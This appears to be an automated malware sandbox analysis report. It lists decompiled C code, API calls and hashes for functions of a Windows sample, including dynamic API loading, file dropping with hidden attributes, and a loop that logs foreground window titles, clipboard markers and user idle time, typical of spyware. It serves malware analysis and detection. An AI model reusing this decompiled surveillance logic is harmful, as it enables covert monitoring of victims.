                                        • Opcode Fuzzy Hash: 24be007b77389102dc2112617a33238c259527d6b97af79cdcea8e1b19f5812d
                                        • Instruction Fuzzy Hash: 57C15D7290051DEBCB04AFE0EC49DEE7B3CFF54345B44802AF916A71A0EB789945CB98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00409908, Relevance: 75.3, APIs: 26, Strings: 17, Instructions: 92libraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 100%
                                        			E00409908() {
				struct HINSTANCE__* _t1;
				_Unknown_base(*)()* _t2;
				_Unknown_base(*)()* _t22;

				_t1 = LoadLibraryA("Psapi.dll"); // executed
				_t2 = GetProcAddress(_t1, "GetModuleFileNameExA");
				 *0x41bc94 = _t2;
				if(_t2 == 0) {
					 *0x41bc94 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExA");
				}
				 *0x41bc90 = GetProcAddress(LoadLibraryA("Psapi.dll"), "GetModuleFileNameExW");
				if( *0x41bc94 == 0) {
					 *0x41bc90 = GetProcAddress(GetModuleHandleA("Kernel32.dll"), "GetModuleFileNameExW");
				}
				 *0x41bca0 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				 *0x41c1e4 = GetProcAddress(GetModuleHandleA("kernel32"), "IsWow64Process");
				 *0x41c1e8 = GetProcAddress(GetModuleHandleA("kernel32"), "GetComputerNameExW");
				 *0x41bc98 = GetProcAddress(GetModuleHandleA("Shell32"), "IsUserAnAdmin");
				 *0x41bcd0 = GetProcAddress(GetModuleHandleA("kernel32"), "SetProcessDEPPolicy");
				 *0x41bca4 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayDevicesW");
				 *0x41bc78 = GetProcAddress(GetModuleHandleA("user32"), "EnumDisplayMonitors");
				 *0x41bca8 = GetProcAddress(GetModuleHandleA("user32"), "GetMonitorInfoW");
				_t22 = GetProcAddress(LoadLibraryA("Shlwapi.dll"), 0xc);
				 *0x41bc9c = _t22;
				return _t22;
			}






                                        0x0040991b
                                        0x00409924
                                        0x0040992c
                                        0x00409933
                                        0x00409944
                                        0x00409944
                                        0x0040995f
                                        0x00409964
                                        0x00409975
                                        0x00409975
                                        0x00409993
                                        0x004099a7
                                        0x004099bb
                                        0x004099cf
                                        0x004099e3
                                        0x004099f7
                                        0x00409a0b
                                        0x00409a1c
                                        0x00409a24
                                        0x00409a28
                                        0x00409a2e

                                        APIs
                                        • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,0041BA38,0041BCB0,00000000,00408F24,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040991B
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409924
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040993F
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409942
                                        • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409953
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409956
                                        • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409970
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409973
                                        • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409984
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409987
                                        • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409998
                                        • GetProcAddress.KERNEL32(00000000), ref: 0040999B
                                        • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099AC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099AF
                                        • GetModuleHandleA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099C0
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099C3
                                        • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099D4
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099D7
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099E8
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099EB
                                        • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004099FC
                                        • GetProcAddress.KERNEL32(00000000), ref: 004099FF
                                        • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A10
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A13
                                        • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409A21
                                        • GetProcAddress.KERNEL32(00000000), ref: 00409A24
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$HandleModule$LibraryLoad
                                        • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$Psapi.dll$SetProcessDEPPolicy$Shell32$Shlwapi.dll$kernel32$kernel32.dll$user32
                                        • API String ID: 551388010-2914448473
                                        • Opcode ID: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction ID: 4c9355c828fc4da35060c465c8423d7dda30a1a04bb52c9e9a5aad065eac730d
                                        • Opcode Fuzzy Hash: 94181ff0da5f878129800e6c898616cd0638ed43b76235def3f7d6061dc3ba3f
                                        • Instruction Fuzzy Hash: F721AFB0E81358B9DA206BB56C4EFDB7E59DA94B54323442BB40893194EFBCC480CEDC
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004135DE, Relevance: 68.4, APIs: 31, Strings: 8, Instructions: 148COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 004135EE
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00413626
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\system32,?,WinDir), ref: 0041365D
                                        • _wgetenv.MSVCRT ref: 0041366D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00413678
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00413683
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0041368F
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413698
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136A1
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136AA
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(\SysWOW64,?,WinDir), ref: 004136BE
                                        • _wgetenv.MSVCRT ref: 004136CE
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 004136D9
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004136E4
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004136F0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004136F9
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00413702
                                        • _wgetenv.MSVCRT ref: 00413720
                                        • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(00000000), ref: 0041372B
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000208,0041BCB0), ref: 00413741
                                        • GetLongPathNameW.KERNELBASE(00000000), ref: 00413748
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 0041375A
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00415A24,?,00000000), ref: 0041376D
                                        • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGIABV?$allocator@G@1@@Z.MSVCP60(?,00000000,?,00000000), ref: 00413783
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041378E
                                        • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0041379A
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137A5
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137AE
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137B7
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C0
                                        • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004137C9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$G@std@@U?$char_traits@$G@2@@std@@$??1?$basic_string@$??0?$basic_string@G@1@@$??4?$basic_string@G@2@@0@Hstd@@V01@V10@0@V?$basic_string@$V01@@_wgetenv$?c_str@?$basic_string@LongNamePath
                                        • String ID: AppData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                        • API String ID: 1999370131-1609423294
                                        • Opcode ID: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction ID: 55aa70349295c49f58eee01d6a61984d570a68084dfe302b191afe96af195224
                                        • Opcode Fuzzy Hash: 734d14ebd294d491d0bf7654c7b9023f6ea533aa70ff64e69f2c683222b563c7
                                        • Instruction Fuzzy Hash: 4451FCB280150EEBCB05DF90ED59DEEB778EF54345B208066F912E3090EB746B49CB69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004055E7, Relevance: 54.2, APIs: 36, Instructions: 168sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNELBASE(00002710), ref: 00405607
                                          • Part of subcall function 00405532: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(80000000,00000007,00000000,00000003,00000080,00000000,00415664,?,0041BCB0,00405614), ref: 00405562
                                          • Part of subcall function 00405532: CreateFileW.KERNELBASE(00000000), ref: 00405569
                                          • Part of subcall function 00405532: GetFileSize.KERNEL32(00000000,00000000), ref: 00405578
                                          • Part of subcall function 00405532: Sleep.KERNEL32(00002710), ref: 004055A7
                                          • Part of subcall function 00405532: FindCloseChangeNotification.KERNELBASE(00000000), ref: 004055AE
                                          • Part of subcall function 00405532: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004055D6
                                        • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405619
                                        • ?empty@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBE_NXZ.MSVCP60 ref: 0040562E
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040563F
                                        • CreateDirectoryW.KERNELBASE(00000000), ref: 00405646
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 00405651
                                        • GetFileAttributesW.KERNELBASE(00000000), ref: 00405658
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00405669
                                        • SetFileAttributesW.KERNELBASE(00000000), ref: 00405670
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000012), ref: 00405681
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000001), ref: 00405690
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 0040569D
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056AA
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004056C5
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004056D0
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004056DC
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 004056F0
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 004056F7
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00405708
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?), ref: 00405714
                                          • Part of subcall function 00412DDF: CreateFileW.KERNEL32(73BCF560,80000000,00000003,00000000,00000003,00000080,00000000,00000000,73BCF560,?,00409C9F,00000000), ref: 00412DF9
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405729
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,00000000), ref: 0040574D
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405756
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405733
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000001,?,?,00000000,00408CAD,00000000), ref: 004030B4
                                          • Part of subcall function 0040309E: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?), ref: 004030C0
                                          • Part of subcall function 0040309E: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,00000000), ref: 004030D5
                                          • Part of subcall function 0040309E: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004030DE
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040575F
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 0040576F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405778
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405782
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,00000000), ref: 0040579A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004057AA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057BB
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004057C4
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664), ref: 004057D1
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000013), ref: 004057E2
                                        • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000006), ref: 004057F1
                                        • SetFileAttributesW.KERNEL32(00000000), ref: 004057F8
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$?c_str@?$basic_string@$G@2@@std@@G@std@@$File$??0?$basic_string@$??1?$basic_string@V01@@$?length@?$basic_string@$?data@?$basic_string@AttributesCreateD@1@@V01@$??4?$basic_string@Sleep$??9std@@?empty@?$basic_string@ChangeCloseD@2@@0@DirectoryExistsFindNotificationPathSizeV?$basic_string@Y?$basic_string@
                                        • String ID:
                                        • API String ID: 131886942-0
                                        • Opcode ID: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                        • Instruction ID: c86808d706488c02b7588af0601caf96bbb35f31f7bc76b7b462248bc21621a9
                                        • Opcode Fuzzy Hash: 117214ba82af0f903fc6147f38b9d825f59407b045661cc97377ae59eabf001a
                                        • Instruction Fuzzy Hash: B0514E72A00909EBCB05ABA0ED5DADE7B78EF84315F04807AF503A71A0DF745A45CF98
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 004059BE, Relevance: 50.9, APIs: 25, Strings: 4, Instructions: 158sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 37%
                                        			E004059BE(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				intOrPtr _v12;
				signed int _v16;
				char _v28;
				char _v44;
				char _v60;
				char _v76;
				void* _v92;
				intOrPtr _t41;
				struct HWND__* _t42;
				int _t43;
				CHAR* _t45;
				signed int _t48;
				char* _t58;
				char* _t59;
				struct HWND__* _t93;
				intOrPtr _t94;
				void* _t99;
				intOrPtr _t112;

				_v12 = __ecx;
				while(1) {
					_t41 = _v12;
					if( *((intOrPtr*)(_t41 + 0x3c)) == 0 &&  *((intOrPtr*)(_t41 + 0x3d)) == 0) {
						break;
					}
					if(( *0x41b990 & 0x00000001) == 0) {
						 *0x41b990 =  *0x41b990 | 0x00000001;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z( &_v5);
						E00413E72(E00405BB5);
					}
					Sleep(0x1f4); // executed
					_t42 = GetForegroundWindow(); // executed
					_t93 = _t42;
					_t43 = GetWindowTextLengthA(_t93);
					_t95 = _t43;
					_t9 = _t95 + 1; // 0x1
					_t45 = _t9;
					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z(_t45, 0,  &_v6);
					if(_t43 != 0) {
						__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
						GetWindowTextA(_t93, _t45, _t45);
						_t58 =  &_v44;
						__imp__??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z(_t58,  &E0041B998);
						if(_t58 == 0) {
							_t59 =  &_v44;
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t59);
							__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
							__imp__?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z(_t59 - 1);
							_t112 =  *0x41b93e; // 0x0
							if(_t112 == 0) {
								_t103 = _t99 - 0x10;
								L00414176();
								L00414170();
								_t99 = _t99 - 0x10 + 0x18;
								E004054E9(_v12, _t103,  &_v60,  &_v60, "\r\n[ ",  &_v44);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(" ]\r\n", 0);
							} else {
								_t99 = _t99 - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
								E00405DD3(_v12,  &_v44);
							}
						}
					}
					_t94 = _v12;
					_t71 = _t94; // executed
					E00406C35(_t94); // executed
					if(E0041269B(_t94) < 0xea60) {
						L16:
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						continue;
					} else {
						while( *((intOrPtr*)(_t94 + 0x3c)) != 0 ||  *((intOrPtr*)(_t94 + 0x3d)) != 0) {
							_t48 = E0041269B(_t71);
							if(_t48 < 0xea60) {
								__imp___itoa(_v16 / 0xea60,  &_v28, 0xa);
								_t101 = _t99 + 0xc - 0x10;
								__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v28,  &_v7, " minutes }\r\n", 0);
								L00414176();
								L00414170();
								_t99 = _t99 + 0xc - 0x10 + 0x18;
								E004054E9(_t94, _t101,  &_v76,  &_v76, "\r\n{ User has been idle for ",  &_v28);
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
								goto L16;
							}
							_v16 = _t48;
							Sleep(0x3e8);
						}
						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
						break;
					}
				}
				return 0;
			}
























                                        0x004059c7
                                        0x004059cc
                                        0x004059cc
                                        0x004059d2
                                        0x00000000
                                        0x00000000
                                        0x004059e4
                                        0x004059e6
                                        0x004059f6
                                        0x00405a01
                                        0x00405a06
                                        0x00405a0c
                                        0x00405a12
                                        0x00405a18
                                        0x00405a1b
                                        0x00405a21
                                        0x00405a28
                                        0x00405a28
                                        0x00405a2f
                                        0x00405a37
                                        0x00405a40
                                        0x00405a4a
                                        0x00405a52
                                        0x00405a58
                                        0x00405a61
                                        0x00405a6b
                                        0x00405a6d
                                        0x00405a76
                                        0x00405a7f
                                        0x00405a8a
                                        0x00405a90
                                        0x00405a96
                                        0x00405ab5
                                        0x00405ac9
                                        0x00405ad3
                                        0x00405adb
                                        0x00405ade
                                        0x00405ae6
                                        0x00405a98
                                        0x00405a98
                                        0x00405aa1
                                        0x00405aaa
                                        0x00405aaa
                                        0x00405a96
                                        0x00405a6b
                                        0x00405aec
                                        0x00405aef
                                        0x00405af1
                                        0x00405b02
                                        0x00405b97
                                        0x00405b9a
                                        0x00000000
                                        0x00405b08
                                        0x00405b08
                                        0x00405b16
                                        0x00405b1d
                                        0x00405b3d
                                        0x00405b4d
                                        0x00405b5c
                                        0x00405b6c
                                        0x00405b76
                                        0x00405b7b
                                        0x00405b80
                                        0x00405b88
                                        0x00405b91
                                        0x00000000
                                        0x00405b91
                                        0x00405b24
                                        0x00405b27
                                        0x00405b27
                                        0x00405ba8
                                        0x00000000
                                        0x00405ba8
                                        0x00405b02
                                        0x00405bb4

                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004059F6
                                        • Sleep.KERNELBASE(000001F4), ref: 00405A0C
                                        • GetForegroundWindow.USER32 ref: 00405A12
                                        • GetWindowTextLengthA.USER32(00000000), ref: 00405A1B
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000001,00000000,?), ref: 00405A2F
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A40
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00405A4A
                                        • GetWindowTextA.USER32 ref: 00405A52
                                        • ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0@Z.MSVCP60(?,0041B998), ref: 00405A61
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00405A76
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00405A7F
                                        • ?resize@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEXI@Z.MSVCP60(-00000001), ref: 00405A8A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405AA1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[ ,?, ],?,?,00000000), ref: 00405AC9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?, ],?,?,00000000), ref: 00405AD3
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                          • Part of subcall function 004054E9: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                          • Part of subcall function 004054E9: SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                          • Part of subcall function 004054E9: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?, ],?,?,00000000), ref: 00405AE6
                                        • Sleep.KERNEL32(000003E8,?,?,?,?,?, ],?,?,00000000), ref: 00405B27
                                        • _itoa.MSVCRT ref: 00405B3D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?, minutes },?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B5C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,{ User has been idle for ,00000000,?,?,?,?,?,?,?,?,?,?,?,?, ]), ref: 00405B6C
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 00405B76
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B88
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B91
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405B9A
